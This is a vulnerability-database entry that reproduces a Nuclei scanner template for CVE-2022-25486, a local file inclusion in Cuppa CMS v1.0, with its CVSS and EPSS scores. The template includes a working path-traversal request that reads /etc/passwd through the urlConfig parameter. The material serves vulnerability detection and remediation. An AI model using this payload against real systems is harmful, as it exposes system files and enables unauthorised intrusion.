Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25486
HistoryApr 21, 2023 - 8:56 a.m.

Cuppa CMS v1.0 - Local File Inclusion

2023-04-2108:56:01
ProjectDiscovery
github.com
8
cve
cve2022
lfi
cuppacms
unauthorized access
sensitive information disclosure
remote code execution

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS

0.015

Percentile

87.1%

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
id: CVE-2022-25486

info:
  name: Cuppa CMS v1.0 - Local File Inclusion
  author: theamanrawat
  severity: high
  description: |
    CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25486
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2022-25486
    cwe-id: CWE-829
    epss-score: 0.01525
    epss-percentile: 0.87021
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,cuppacms

http:
  - raw:
      - |
        POST /alerts/alertConfigField.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        urlConfig=../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402202f1740073b822d3173dca404379a8be3ea219605153d606b6cb8854a7f26838c02207a187fc2566ef3b2a72d9d786462cb900abf131d4a4b36d2c997db4d85d4d772:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS

0.015

Percentile

87.1%

Related for NUCLEI:CVE-2022-25486